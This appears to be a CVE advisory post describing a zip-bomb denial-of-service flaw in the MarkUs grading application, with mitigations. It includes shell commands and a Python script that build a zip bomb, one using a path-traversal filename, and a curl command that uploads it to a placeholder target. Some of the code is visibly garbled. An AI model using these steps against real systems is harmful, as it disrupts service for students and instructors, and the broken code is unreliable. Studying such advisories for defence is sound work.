MarkUs Unrestricted File Upload Vulnerability, CVE-2026-25962 (Medium)

Listen to this Post

CVE-2026-25962 is a vulnerability in MarkUs, a web application used for submitting and grading student assignments. The issue resides in the application’s handling of zip file extraction prior to version 2.9.4. Specifically, MarkUs did not enforce any limits on the size of the zip file being uploaded or the number of entries contained within it. This flaw can be triggered in two primary scenarios: an instructor uploading a zip file to configure an assignment, or a student uploading a zip file as part of an assignment submission where the contents are meant to be extracted. By exploiting this, an attacker could upload a maliciously crafted “zip bomb” – a small zip file that expands to an enormous size, consuming all available disk space, or one containing an extreme number of files, exhausting file system inodes and CPU resources during extraction. This uncontrolled resource consumption effectively leads to a denial of service, making the MarkUs application unavailable to legitimate users. The vulnerability is patched in MarkUs version 2.9.4, which likely introduces checks on file sizes and entry counts during the extraction process.
Platform: MarkUs
Version: < 2.9.4
Vulnerability: Unrestricted Zip Extraction
Severity: Medium
Date: 03/05/2026

Prediction: Patch Released

What Undercode Say:

Analytics

The vulnerability (CVE-2026-25962) exists in the unzip functionality, which lacks guards against decompression bombs. The following commands and concepts are relevant to identifying and understanding this vulnerability.

Check version:

Check the installed version of MarkUs
bundle list | grep markus
or check the version in the Gemfile or config/initializers/version.rb
cat config/initializers/version.rb

Simulate malicious zip creation:

Create a zip bomb for testing (use with extreme caution in isolated environments)
This creates a 1GB file full of zeros and zips it.
dd if=/dev/zero of=payload.txt bs=1M count=1024
zip -r bomb.zip payload.txt
The resulting bomb.zip will be relatively small, but unzipping it will consume 1GB.

Check disk and inode usage:

Monitor disk space before and after exploitation
df -h
Monitor inode usage
df -i

Exploit

An attacker can craft a malicious zip file that causes a denial of service.

Zip Bomb Creation (Conceptual):

Example of a script to generate a zip bomb (for educational purposes only)
This is a simplified version. Real zip bombs use nested zip files for extreme ratios.
import zipfile
import os
Create a large dummy file (e.g., 1GB of zeros)
with open('large_payload.txt', 'wb') as f:
f.seek(102410241024 - 1) Seek to 1GB - 1 byte
f.write(b'\0')
Create a zip archive containing this large file
with zipfile.ZipFile('evil.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
zf.write('large_payload.txt', arcname='../../../../tmp/exploit.txt') Potential path traversal
Clean up the large payload
os.remove('large_payload.txt')
print("Created evil.zip")

Upload via Curl:

Example curl command to upload the malicious zip file
(Assuming the submission endpoint is /assignments/1/submissions)
curl -X POST -F "submission[bash][email protected]" http://target-markus.com/assignments/1/submissions

Protection from this CVE

  1. Patch Immediately: Upgrade Markus to version 2.9.4 or later. This is the primary and most effective mitigation.
    git pull origin master
    bundle install
    rails db:migrate
    
  2. Implement File Validation: If patching is not immediately possible, apply strict validation on zip file uploads.
    Set a maximum file size for the uploaded zip archive (e.g., 100MB).
    Set a maximum uncompressed size and a maximum number of files.

Check file types and filenames for malicious content.

  1. Resource Limits: Configure system-level resource limits for the web application process (e.g., using systemd `MemoryMax` and `TasksMax` for the Rails server) to contain the impact of a successful attack.
  2. Input Sanitization: Ensure the extraction path is sanitized to prevent path traversal, as a zip bomb could be combined with this technique.

Impact

A successful exploit of CVE-2026-25962 leads to a Denial of Service (DoS).
Resource Exhaustion: The target server’s disk space is filled, or its inodes are exhausted.
Service Disruption: MarkUs becomes unresponsive or crashes, preventing instructors from accessing the platform and students from submitting or viewing assignments.
Operational Impact: Requires manual intervention by system administrators to clean up the extracted files and restore service, leading to downtime and loss of productivity.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top